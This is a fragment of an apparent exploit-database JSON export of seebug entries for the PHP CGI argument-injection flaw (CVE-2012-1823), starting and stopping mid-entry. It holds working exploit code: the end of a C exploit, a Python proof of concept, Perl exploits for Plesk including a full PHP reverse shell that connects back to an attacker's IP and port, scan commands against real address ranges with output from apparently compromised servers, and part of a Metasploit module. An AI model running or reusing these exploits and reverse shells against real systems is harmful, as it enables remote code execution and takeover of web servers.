strlen(reverseportstr) + 64;\r\n tmpstr = (char*)calloc(tmpsize, sizeof(char));\r\n snprintf(tmpstr, tmpsize, phpstr, reverseip, reverseport);\r\n \r\n writesize = strlen(target) + strlen(interpreter) + \r\n strlen(poststr) + strlen(tmpstr) + 64;\r\n writestr = (char*)calloc(writesize, sizeof(char));\r\n snprintf(writestr, writesize, poststr, interpreter,\r\n target, strlen(tmpstr), tmpstr);\r\n \r\n if (!httpsflag) {\r\n\t write(sockfd, writestr, strlen(writestr));\r\n\t readbuf = read_(sockfd);\r\n } else {\r\n\t SSL_write(sslconnection-&#62;handle, writestr, strlen(writestr));\r\n\t readbuf = sslread(sslconnection);\r\n }\r\n \r\n if (readbuf) {\r\n printf(&#34;***SERVER RESPONSE***\\n\\n%s\\n\\n&#34;, readbuf); \r\n } else {\r\n printf(&#34;read error (15)\\n&#34;);\r\n exit(255);\t \r\n }\r\n }\r\n exit(1);\r\n}\r\n\r\n\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-82805"}, {"lastseen": "2017-11-19T15:54:18", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-72860", "id": "SSV:72860", "title": "PHP CGI Argument Injection Exploit", "type": "seebug", "sourceData": "\n ######################################################################################\r\n# Exploit Title: Cve-2012-1823 PHP CGI Argument Injection Exploit\r\n# Date: May 4, 2012\r\n# Author: rayh4c[0x40]80sec[0x2e]com\r\n# Exploit Discovered by wofeiwo[0x40]80sec[0x2e]com\r\n######################################################################################\r\n\r\nimport socket\r\nimport sys\r\n\r\ndef cgi_exploit():\r\n pwn_code = &#34;&#34;&#34;&#60;?php phpinfo();?&#62;&#34;&#34;&#34; \r\n post_Length = len(pwn_code)\r\n http_raw=&#34;&#34;&#34;POST /?-dallow_url_include%%3don+-dauto_prepend_file%%3dphp://input HTTP/1.1\r\nHost: %s\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %s\r\n\r\n%s\r\n&#34;&#34;&#34; %(HOST , post_Length ,pwn_code)\r\n print http_raw\r\n try:\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n sock.connect((HOST, int(PORT)))\r\n sock.send(http_raw)\r\n data = sock.recv(10000)\r\n print repr(data)\r\n sock.close()\r\n except socket.error, msg:\r\n sys.stderr.write(&#34;[ERROR] %s\\n&#34; % msg[1])\r\n sys.exit(1)\r\n \r\nif __name__ == &#39;__main__&#39;:\r\n try:\r\n HOST = sys.argv[1]\r\n PORT = sys.argv[2]\r\n cgi_exploit()\r\n except IndexError:\r\n print &#39;[+]Usage: cgi_test.py site.com 80&#39;\r\n sys.exit(-1)\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-72860"}, {"lastseen": "2017-11-19T13:38:05", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-79637", "id": "SSV:79637", "title": "Plesk < 9.5.4 - Zeroday Remote Exploit", "type": "seebug", "sourceData": "\n Plesk Apache zeroday / June 2013\r\ndiscovered & exploited by kingcope\r\n\r\n\r\nthis Plesk configuration setting makes it possible:\r\nscriptAlias /phppath/ &#34;/usr/bin/&#34;\r\nFurthermore this is not cve-2012-1823 because the php interpreter is called directly.\r\n(no php file is called)\r\n\r\nParallels Plesk Remote Exploit -- PHP Code Execution and therefore Command Execution\r\nAffected and tested: Plesk 9.5.4\r\n\t\t\t\t\t Plesk 9.3\r\n\t\t\t\t\t Plesk 9.2\r\n\t\t\t\t\t Plesk 9.0\r\n\t\t\t\t\t Plesk 8.6\r\nDiscovered & Exploited by Kingcope / June 2013\r\nAffected and tested OS: RedHat, CentOS, Fedora\r\nAffected and tested Platforms: Linux i386, Linux x86_64\r\nUntested OS: Windows (php.exe?)\r\nUnaffected: 11.0.9 due to compiled in protection of PHP version\r\nTraces in /var/log/httpd/access_log: 192.168.74.142 - - [19/Mar/2013:18:59:41 +0100] &#34;POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%\r\n6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%\r\n62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%\r\n3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1&#34; 200 203 &#34;-&#34; &#34;Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)&#34;\r\nShodanhq overview of Plesk on Linux:\r\nhttp://www.shodanhq.com/search?q=plesklin\r\n\r\nperl plesk-simple.pl &#60;ip address&#62;\r\n...\r\n...\r\n...\r\nOK\r\nLinux ip.unsecure.net 2.6.18-028stab101.1 #1 SMP Sun Jun 24\r\n 19:50:48 MSD 2012 i686 i686 i386 GNU/Linux\r\nuid=48(apache) gid=48(apache) groups=48(apache),2521(psaserv)\r\n---\r\n./pnscan -w&#34;GET /phppath/php HTTP/1.0\\r\\n\\r\\n&#34; -r &#34;500 Internal&#34; 76.12.54.163/16 80\r\nperl plesk-simple.pl 76.12.81.206\r\nHTTP/1.1 200 OK\r\nDate: Sat, 16 Mar 2013 13:39:35 GMT\r\nServer: Apache/2.2.3 (CentOS)\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\n\r\n77\r\nLinux 114114.unsecureweb.com 2.6.18-308.24.1.el5 #1 SMP Tue Dec 4 17:43:34 E\r\nST 2012 x86_64 x86_64 x86_64 GNU/Linux\r\n\r\n3e\r\nuid=48(apache) gid=48(apache) groups=48(apache),2521(psaserv)\r\n\r\n0\r\n\r\nperl plesk-simple-ssl.pl &#60;ip&#62; (use HTTPS because HTTP gave an internal server error)\r\nHTTP/1.1 200 OK\r\nDate: Tue, 19 Mar 2013 15:29:28 GMT\r\nServer: Apache/2.0.54 (Fedora)\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\n\r\n3\r\nOK\r\n\r\n60\r\nLinux www.ucdavis.edu 2.6.17-1.2142_FC4 #1 Tue Jul 11 22:41:14 EDT 2006 i686 i686 i386 GNU/Linux\r\n\r\n4c\r\nuid=48(apache) gid=48(apache) groups=48(apache),500(webadmin),2522(psaserv)\r\n\r\n0\r\n\r\n\r\n\r\nuse IO::Socket;\r\nuse URI::Escape;\r\n$sock = IO::Socket::INET-&#62;new(PeerAddr =&#62; $ARGV[0],\r\n PeerPort =&#62; 80,\r\n Proto =&#62; &#39;tcp&#39;);\r\n$pwn = &#39;&#60;?php echo &#34;Content-Type:text/html\\r\\n\\r\\n&#34;;echo &#34;OK\\n&#34;;system(&#34;uname -a;id;&#34;); ?&#62;&#39;;\r\n$arguments = uri_escape(&#34;-d&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; . \r\n\t\t\t uri_escape(&#34;allow_url_include=on&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n\t\t\t uri_escape(&#34;-d&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n\t\t\t uri_escape(&#34;safe_mode=off&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n\t\t\t uri_escape(&#34;-d&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n\t\t\t uri_escape(&#34;suhosin.simulation=on&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n\t\t\t uri_escape(&#34;-d&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n\t\t\t uri_escape(&#34;disable_functions=\\&#34;\\&#34;&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n\t\t\t uri_escape(&#34;-d&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; . \r\n\t\t\t uri_escape(&#34;open_basedir=none&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n\t\t\t uri_escape(&#34;-d&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n\t\t\t uri_escape(&#34;auto_prepend_file=php://input&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n\t\t\t uri_escape(&#34;-n&#34;,&#34;\\0-\\377&#34;);\r\n$path = uri_escape(&#34;phppath&#34;,&#34;\\0-\\377&#34;) . &#34;/&#34; . uri_escape(&#34;php&#34;,&#34;\\0-\\377&#34;);\r\nprint $sock &#34;POST /$path?$arguments HTTP/1.1\\r\\n&#34;\r\n .&#34;Host: $ARGV[0]\\r\\n&#34;\r\n .&#34;Content-Type: application/x-www-form-urlencoded\\r\\n&#34;\r\n .&#34;Content-Length: &#34;. length($pwn) .&#34;\\r\\n\\r\\n&#34; . $pwn;\r\nwhile(&#60;$sock&#62;) {\r\n print;\r\n}\r\n\r\nuse IO::Socket::SSL;\r\nuse URI::Escape;\r\n$sock = IO::Socket::SSL-&#62;new(PeerAddr =&#62; $ARGV[0],\r\n PeerPort =&#62; 443,\r\n Proto =&#62; &#39;tcp&#39;);\r\n$pwn = &#39;&#60;?php echo &#34;Content-Type:text/html\\r\\n\\r\\n&#34;;echo &#34;OK\\n&#34;;system(&#34;uname -a;id;&#34;); ?&#62;&#39;;\r\n$arguments = uri_escape(&#34;-d&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; . \r\n\t\t\t uri_escape(&#34;allow_url_include=on&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n\t\t\t uri_escape(&#34;-d&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n\t\t\t uri_escape(&#34;safe_mode=off&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n\t\t\t uri_escape(&#34;-d&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n\t\t\t uri_escape(&#34;suhosin.simulation=on&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n\t\t\t uri_escape(&#34;-d&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n\t\t\t uri_escape(&#34;disable_functions=\\&#34;\\&#34;&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n\t\t\t uri_escape(&#34;-d&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; . \r\n\t\t\t uri_escape(&#34;open_basedir=none&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n\t\t\t uri_escape(&#34;-d&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n\t\t\t uri_escape(&#34;auto_prepend_file=php://input&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n\t\t\t uri_escape(&#34;-n&#34;,&#34;\\0-\\377&#34;);\r\n$path = uri_escape(&#34;phppath&#34;,&#34;\\0-\\377&#34;) . &#34;/&#34; . uri_escape(&#34;php&#34;,&#34;\\0-\\377&#34;);\r\nprint $sock &#34;POST /$path?$arguments HTTP/1.1\\r\\n&#34;\r\n .&#34;Host: $ARGV[0]\\r\\n&#34;\r\n .&#34;Content-Type: application/x-www-form-urlencoded\\r\\n&#34;\r\n .&#34;Content-Length: &#34;. length($pwn) .&#34;\\r\\n\\r\\n&#34; . $pwn;\r\nwhile(&#60;$sock&#62;) {\r\n print;\r\n}\r\n#CentOS/Redhat Linux: yum install perl-IO-Socket-SSL.noarch\r\n\r\n###############################################################################################################\r\n\r\nplesk-simple-ssl.pl\r\n\r\n#plesk remote exploit by kingcope\r\n#all your base belongs to me :&#62;\r\nuse IO::Socket::SSL;\r\nuse URI::Escape;\r\n$sock = IO::Socket::SSL-&#62;new(PeerAddr =&#62; $ARGV[0],\r\n PeerPort =&#62; 443,\r\n Proto =&#62; &#39;tcp&#39;);\r\n$pwn = &#39;&#60;?php echo &#34;Content-Type:text/html\\r\\n\\r\\n&#34;;echo &#34;OK\\n&#34;;system(&#34;uname -a;id;&#34;); ?&#62;&#39;;\r\n$arguments = uri_escape(&#34;-d&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; . \r\n\t\t\t uri_escape(&#34;allow_url_include=on&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n\t\t\t uri_escape(&#34;-d&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n\t\t\t uri_escape(&#34;safe_mode=off&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n\t\t\t uri_escape(&#34;-d&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n\t\t\t uri_escape(&#34;suhosin.simulation=on&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n\t\t\t uri_escape(&#34;-d&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n\t\t\t uri_escape(&#34;disable_functions=\\&#34;\\&#34;&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n\t\t\t uri_escape(&#34;-d&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; . \r\n\t\t\t uri_escape(&#34;open_basedir=none&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n\t\t\t uri_escape(&#34;-d&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n\t\t\t uri_escape(&#34;auto_prepend_file=php://input&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n\t\t\t uri_escape(&#34;-n&#34;,&#34;\\0-\\377&#34;);\r\n$path = uri_escape(&#34;phppath&#34;,&#34;\\0-\\377&#34;) . &#34;/&#34; . uri_escape(&#34;php&#34;,&#34;\\0-\\377&#34;);\r\nprint $sock &#34;POST /$path?$arguments HTTP/1.1\\r\\n&#34;\r\n .&#34;Host: $ARGV[0]\\r\\n&#34;\r\n .&#34;User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\\r\\n&#34; \r\n .&#34;Content-Type: application/x-www-form-urlencoded\\r\\n&#34;\r\n .&#34;Content-Length: &#34;. length($pwn) .&#34;\\r\\n\\r\\n&#34; . $pwn;\r\nwhile(&#60;$sock&#62;) {\r\n print;\r\n}\r\n#CentOS/Redhat Linux: yum install perl-IO-Socket-SSL.noarch\r\n\r\n\r\n###############################################################################################################\r\n\r\nplesk-simple.pl\r\n\r\n\r\n#plesk remote exploit by kingcope\r\n#all your base belongs to me :&#62;\r\nuse IO::Socket;\r\nuse URI::Escape;\r\n$sock = IO::Socket::INET-&#62;new(PeerAddr =&#62; $ARGV[0],\r\n PeerPort =&#62; 80,\r\n Proto =&#62; &#39;tcp&#39;);\r\n$pwn = &#39;&#60;?php echo &#34;Content-Type:text/html\\r\\n\\r\\n&#34;;echo &#34;OK\\n&#34;;system(&#34;uname -a;id;&#34;); ?&#62;&#39;;\r\n$arguments = uri_escape(&#34;-d&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; . \r\n\t\t\t uri_escape(&#34;allow_url_include=on&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n\t\t\t uri_escape(&#34;-d&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n\t\t\t uri_escape(&#34;safe_mode=off&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n\t\t\t uri_escape(&#34;-d&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n\t\t\t uri_escape(&#34;suhosin.simulation=on&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n\t\t\t uri_escape(&#34;-d&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n\t\t\t uri_escape(&#34;disable_functions=\\&#34;\\&#34;&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n\t\t\t uri_escape(&#34;-d&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; . \r\n\t\t\t uri_escape(&#34;open_basedir=none&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n\t\t\t uri_escape(&#34;-d&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n\t\t\t uri_escape(&#34;auto_prepend_file=php://input&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n\t\t\t uri_escape(&#34;-n&#34;,&#34;\\0-\\377&#34;);\r\n$path = uri_escape(&#34;phppath&#34;,&#34;\\0-\\377&#34;) . &#34;/&#34; . uri_escape(&#34;php&#34;,&#34;\\0-\\377&#34;);\r\nprint $sock &#34;POST /$path?$arguments HTTP/1.1\\r\\n&#34;\r\n .&#34;Host: $ARGV[0]\\r\\n&#34;\r\n .&#34;User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\\r\\n&#34;\r\n .&#34;Content-Type: application/x-www-form-urlencoded\\r\\n&#34;\r\n .&#34;Content-Length: &#34;. length($pwn) .&#34;\\r\\n\\r\\n&#34; . $pwn;\r\nwhile(&#60;$sock&#62;) {\r\n print;\r\n}\r\n\r\n\r\n###############################################################################################################\r\n\r\nplesk.pl\r\n\r\n#plesk remote exploit by kingcope\r\n#all your base belongs to me :&#62;\r\nuse IO::Socket;\r\nuse IO::Socket::SSL;\r\nuse URI::Escape;\r\nsub usage {\r\n print &#34;usage: $0 &#60;target&#62; &#60;http/https&#62; &#60;local_ip&#62; &#60;local_port&#62;\\n&#34;;exit;\r\n}\r\nif (!defined($ARGV[3])){usage();}\r\n$target=$ARGV[0];\r\n$proto=$ARGV[1];\r\nif ($proto eq &#34;http&#34;) {\r\n$sock = IO::Socket::INET-&#62;new(\r\n PeerAddr =&#62; $ARGV[0],\r\n PeerPort =&#62; 80,\r\n Proto =&#62; &#39;tcp&#39;);\r\n}elsif ($proto eq &#34;https&#34;) {\r\n$sock = IO::Socket::SSL-&#62;new(\r\n PeerAddr =&#62; $ARGV[0],\r\n PeerPort =&#62; 443,\r\n Proto =&#62; &#39;tcp&#39;);\r\n}else {usage();}\r\n$lip=$ARGV[2];\r\n$lport=$ARGV[3];\r\n$pwn=&#34;&#60;?php echo \\&#34;Content-Type: text/plain\\r\\n\\r\\n\\&#34;;set_time_limit (0); \\$VERSION = \\&#34;1.0\\&#34;; \\$ip =\r\n&#39;$lip&#39;; \\$port = $lport; \\$chunk_size = 1400; \\$write_a = null;\r\n\\$error_a = null; \\$shell = &#39;/bin/sh -i&#39;; \\$daemon =\r\n0;\\$debug = 0; if (function_exists(&#39;pcntl_fork&#39;)) { \\$pid =\r\npcntl_fork(); if (\\$pid == -1) { printit(\\&#34;ERROR: Can&#39;t fork\\&#34;);\r\nexit(1);} if (\\$pid) { exit(0);} if (posix_setsid() == -1) {\r\nprintit(\\&#34;Error: Can&#39;t setsid()\\&#34;); exit(1); } \\$daemon = 1;} else {\r\nprintit(\\&#34;WARNING: Failed to daemonise. This is quite common and not\r\nfatal.\\&#34;);}chdir(\\&#34;/\\&#34;); umask(0); \\$sock = fsockopen(\\$ip, \\$port,\r\n\\$errno, \\$errstr, 30);if (!\\$sock) { printit(\\&#34;\\$errstr (\\$errno)\\&#34;);\r\nexit(1);} \\$descriptorspec = array(0 =&#62; array(\\&#34;pipe\\&#34;, \\&#34;r\\&#34;),1 =&#62;\r\narray(\\&#34;pipe\\&#34;, \\&#34;w\\&#34;), 2 =&#62; array(\\&#34;pipe\\&#34;, \\&#34;w\\&#34;));\\$process =\r\nproc_open(\\$shell, \\$descriptorspec, \\$pipes);if\r\n(!is_resource(\\$process)) { printit(\\&#34;ERROR: Can&#39;t spawn shell\\&#34;);\r\nexit(1);}stream_set_blocking(\\$pipes[0],\r\n0);stream_set_blocking(\\$pipes[1], 0);stream_set_blocking(\\$pipes[2],\r\n0);stream_set_blocking(\\$sock, 0);while (1) { if (feof(\\$sock)) {\r\nprintit(\\&#34;done.\\&#34;); break;} if\r\n(feof(\\$pipes[1])) {printit(\\&#34;done.\\&#34;);break;}\\$read_a = array(\\$sock, \\$pipes[1],\r\n\\$pipes[2]);\\$num_changed_sockets = stream_select(\\$read_a, \\$write_a,\r\n\\$error_a, null);if (in_array(\\$sock, \\$read_a)) {if (\\$debug)\r\nprintit(\\&#34;SOCK READ\\&#34;);\\$input = fread(\\$sock,\r\n\\$chunk_size);if(\\$debug) printit(\\&#34;SOCK:\r\n\\$input\\&#34;);fwrite(\\$pipes[0], \\$input);}if (in_array(\\$pipes[1],\r\n\\$read_a)) {if (\\$debug) printit(\\&#34;STDOUT READ\\&#34;);\\$input =\r\nfread(\\$pipes[1], \\$chunk_size);if (\\$debug) printit(\\&#34;STDOUT:\r\n\\$input\\&#34;);fwrite(\\$sock, \\$input);}if (in_array(\\$pipes[2],\r\n\\$read_a)) {if (\\$debug) printit(\\&#34;STDERR READ\\&#34;);\\$input =\r\nfread(\\$pipes[2], \\$chunk_size); if (\\$debug) printit(\\&#34;STDERR:\r\n\\$input\\&#34;);fwrite(\\$sock,\r\n\\$input);}}fclose(\\$sock);fclose(\\$pipes[0]);fclose(\\$pipes[1]);fclose(\\$pipes[2]);proc_close(\\$process);function printit (\\$string) {if (!\\$daemon) {print\r\n\\&#34;\\$string\\n\\&#34;;}}\r\n?&#62;&#34;;\r\n$arguments=uri_escape(&#34;-d&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n uri_escape(&#34;allow_url_include=on&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n uri_escape(&#34;-d&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n uri_escape(&#34;safe_mode=off&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n uri_escape(&#34;-d&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n uri_escape(&#34;suhosin.simulation=on&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n uri_escape(&#34;-d&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n uri_escape(&#34;disable_functions=\\&#34;\\&#34;&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n uri_escape(&#34;-d&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n uri_escape(&#34;open_basedir=none&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n uri_escape(&#34;-d&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n uri_escape(&#34;auto_prepend_file=php://input&#34;,&#34;\\0-\\377&#34;). &#34;+&#34; .\r\n uri_escape(&#34;-n&#34;,&#34;\\0-\\377&#34;);\r\n$path=uri_escape(&#34;phppath&#34;,&#34;\\0-\\377&#34;). &#34;/&#34; . uri_escape(&#34;php&#34;,&#34;\\0-\\377&#34;);\r\nprint $sock &#34;POST /$path?$arguments HTTP/1.1\\r\\n&#34;.\r\n &#34;Host: $ARGV[0]\\r\\n&#34;.\r\n &#34;User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\\r\\n&#34;.\r\n &#34;Content-Type: text/plain\\r\\n&#34;.\r\n &#34;Content-Length: &#34;. length($pwn) .&#34;\\r\\n\\r\\n&#34;. $pwn;\r\nwhile(&#60;$sock&#62;){print $_;};\r\n\r\n\r\n###############################################################################################################\r\n\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-79637"}, {"lastseen": "2017-11-19T15:53:29", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-72859", "id": "SSV:72859", "title": "PHP CGI Argument Injection", "type": "seebug", "sourceData": "\n ##\r\n# $Id$\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire &#39;msf/core&#39;\r\n\r\nclass Metasploit3 &#60; Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t&#39;Name&#39; =&#62; &#39;PHP CGI Argument Injection&#39;,\r\n\t\t\t&#39;Description&#39; =&#62; %q{\r\n\t\t\t\tWhen run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to\r\n\t\t\t\tan argument injection vulnerability. This module takes advantage of\r\n\t\t\t\tthe -d flag to set php.ini directives to achieve code execution.\r\n\t\t\t\tFrom the advisory: &#34;if there is NO unescaped &#39;=&#39; in the query string,\r\n\t\t\t\tthe string is split on &#39;+&#39; (encoded space) characters, urldecoded,\r\n\t\t\t\tpassed to a function that escapes shell metacharacters (the &#34;encoded in\r\n\t\t\t\ta system-defined manner&#34; from the RFC) and then passes them to the CGI\r\n\t\t\t\tbinary.&#34;\r\n\t\t\t},\r\n\t\t\t&#39;Author&#39; =&#62; [ &#39;egypt&#39;, &#39;hdm&#39; ],\r\n\t\t\t&#39;License&#39; =&#62; MSF_LICENSE,\r\n\t\t\t&#39;Version&#39; =&#62; &#39;$Revision$&#39;,\r\n\t\t\t&#39;References&#39; =&#62; [\r\n\t\t\t\t\t[ &#34;CVE&#34;\t, &#34;2012-1823&#34; ],\r\n\t\t\t\t\t[ &#34;URL&#34;\t, &#34;http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/&#34; ],\r\n\t\t\t\t],\r\n\t\t\t&#39;Privileged&#39; =&#62; false,\r\n\t\t\t&#39;Payload&#39; =&#62;\r\n\t\t\t\t{\r\n\t\t\t\t\t&#39;DisableNops&#39; =&#62; true,\r\n\t\t\t\t\t# Arbitrary big number. The payload gets sent as an HTTP\r\n\t\t\t\t\t# response body, so really it&#39;s unlimited\r\n\t\t\t\t\t&#39;Space&#39; =&#62; 262144, # 256k\r\n\t\t\t\t},\r\n\t\t\t&#39;DisclosureDate&#39; =&#62; &#39;May 03 2012&#39;,\r\n\t\t\t&#39;Platform&#39; =&#62; &#39;php&#39;,\r\n\t\t\t&#39;Arch&#39; =&#62; ARCH_PHP,\r\n\t\t\t&#39;Targets&#39; =&#62; [[ &#39;Automatic&#39;, { }]],\r\n\t\t\t&#39;DefaultTarget&#39; =&#62; 0))\r\n\r\n\t\tregister_options([\r\n\t\t\tOptString.new(&#39;TARGETURI&#39;, [false, &#34;The URI to request (must be a CGI-handled PHP script)&#34;]),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\t# php-cgi -h\r\n\t# ...\r\n\t# -s Display colour syntax highlighted source.\r\n\tdef check\r\n\t\turi = target_uri.path\r\n\r\n\t\turi.gsub!(/\\?.*/, &#34;&#34;)\r\n\r\n\t\tprint_status(&#34;Checking uri #{uri}&#34;)\r\n\r\n\t\tresponse = send_request_raw({ &#39;uri&#39; =&#62; uri })\r\n\r\n\t\tif response and response.code == 200 and response.body =~ /\\&#60;code\\&#62;\\&#60;span style.*\\&lt\\;\\?/mi\r\n\t\t\tprint_error(&#34;Server responded in a way that was ambiguous, could not determine whether it was vulnerable&#34;)\r\n\t\t\treturn Exploit::CheckCode::Unknown\r\n\t\tend\r\n\r\n\t\tresponse = send_request_raw({ &#39;uri&#39; =&#62; uri + &#39;?-s&#39;})\r\n\t\tif response and response.code == 200 and response.body =~ /\\&#60;code\\&#62;\\&#60;span style.*\\&lt\\;\\?/mi\r\n\t\t\treturn Exploit::CheckCode::Vulnerable\r\n\t\tend\r\n\r\n\t\tprint_error(&#34;Server responded indicating it was not vulnerable&#34;)\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tbegin\r\n\t\t\targs = [\r\n\t\t\t\t&#34;-d+allow_url_include%3d#{rand_php_ini_true}&#34;,\r\n\t\t\t\t&#34;-d+safe_mode%3d#{rand_php_ini_false}&#34;,\r\n\t\t\t\t&#34;-d+suhosin.simulation%3d#{rand_php_ini_true}&#34;,\r\n\t\t\t\t&#34;-d+disable_functions%3d%22%22&#34;,\r\n\t\t\t\t&#34;-d+open_basedir%3dnone&#34;,\r\n\t\t\t\t&#34;-d+auto_prepend_file%3dphp://input&#34;,\r\n\t\t\t\t&#34;-n&#34;\r\n\t\t\t]\r\n\r\n\t\t\tqs = args.join(&#34;+&#34;)\r\n\t\t\turi = &#34;#{target_uri}?#{qs}&#34;\r\n\r\n\t\t\t# Has to be all on one line, so gsub out the comments and the newlines\r\n\t\t\tpayload_oneline = &#34;&#60;?php &#34; + payload.encoded.gsub(/\\s*#.*$/, &#34;&#34;).gsub(&#34;\\n&#34;, &#34;&#34;)\r\n\t\t\tresponse = send_request_cgi( {\r\n\t\t\t\t&#39;method&#39; =&#62; &#34;POST&#34;,\r\n\t\t\t\t&#39;global&#39; =&#62; true,\r\n\t\t\t\t&#39;uri&#39; =&#62; uri,\r\n\t\t\t\t&#39;data&#39; =&#62; payload_oneline,\r\n\t\t\t}, 0.5)\r\n\t\t\thandler\r\n\r\n\t\trescue ::Interrupt\r\n\t\t\traise $!\r\n\t\trescue ::Rex::HostUnreachable, ::Rex::ConnectionRefused\r\n\t\t\tprint_error(&#34;The target service unreachable&#34;)\r\n\t\trescue 